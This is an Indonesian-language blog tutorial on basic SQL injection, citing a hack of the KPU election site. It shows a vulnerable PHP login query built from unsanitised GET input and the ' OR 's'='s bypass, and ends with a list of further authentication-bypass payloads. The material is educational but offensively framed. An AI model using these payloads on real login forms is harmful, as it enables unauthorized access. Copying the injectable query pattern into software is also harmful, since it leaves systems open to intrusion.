SQL Injection

Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs KPU pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan port p ort yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tool .ke situs tersebut yang konon system yang seharga 152 milyar itu keamanannya berlapis lapis.

Dalam pembahasan ini hanya disebutkan basic atau dasar dasar dari teknik hacking yang dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang terproteksi sebagai siapa saja (anonymous) dengan hanya mengetahui username tanpa harus mengetahui passwordnya bahkan kita juga bisa login tanpa perlu mengetahui username dan password sama sekali SQL Injection merupakan teknik hacking yang memanfaatkan perintah SQL untuk memanipulasi script pada web korban sehingga script tersebut meloloskan perintah SQL yang simasukkan si penyerang.

Ilustrasi Kasus

Dalam ilustrasi kasus ini kita akan membuat web server sebagai korban. Web server ini dibangun menggunakan :

Apache

untuk membangun web server

PHP

sebagai bahasa pemrograman

MySQL untuk database server

Pada server, terdapat script PHP untuk

memeriksa login sebagai berikut :

$username = $_GET[‘username’];

$password = $_GET[‘password’];

$sql = mysql_query(“SELECT * FROM

login WHERE username=’$username’ &&

password=’$password'”);

Nah! Script inilah yang akan kita manfaatkan untuk melakukan SQL injection

Sebagai Login standart seharusnya user harus

memasukkan

username

: admin

password

: 123456

Namun sebagai user yang ‘nakal’ kita tidak perlu mengetahui username dan password tersebut untuk dapat masuk. Cukup kita manfaatkan script PHP yang telah disebutkan diatas Kita siap dengan “niat jahat” kita. Untuk mewujudkan niat tersebut kita cukup membuat query SQL ‘kebingungan’ sehingga meloloskan nilai true atau string kosong (‘ ‘) tanpa mengecek keberadaan akun user pada field username dan password pada tabel login.

Kita masukkan script ‘ OR ‘s’=’s pada input username dan password.

username = ‘ OR ‘s’=’s

password = ‘ OR ‘s’=’s

Script yang kita masukkan tadi akan mengacaukan query:

$sql = mysql_query(“SELECT * FROM login

WHERE username=’$username’ &&

password=’$password'”);

sehingga perintah query menjadi :

$sql = mysql_query(“SELECT * FROM login

WHERE username=’‘ OR ‘s’=’s‘ &&

password=’‘ OR ‘s’=’s‘”);

ini artinya jika

username = ‘ ‘ atau username = true dan

password = ‘ ‘ atau password = true

maka user akan dapat login

Kemungkinan kemungkinan script lainya :

or 1=1″

or 1=1or

1=1′

or ‘a’=’a

” or “a”=”a

‘) or (‘a’=’a

‘ or 0=0 “

or 0=0 or

0=0 ‘

or 0=0 #

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s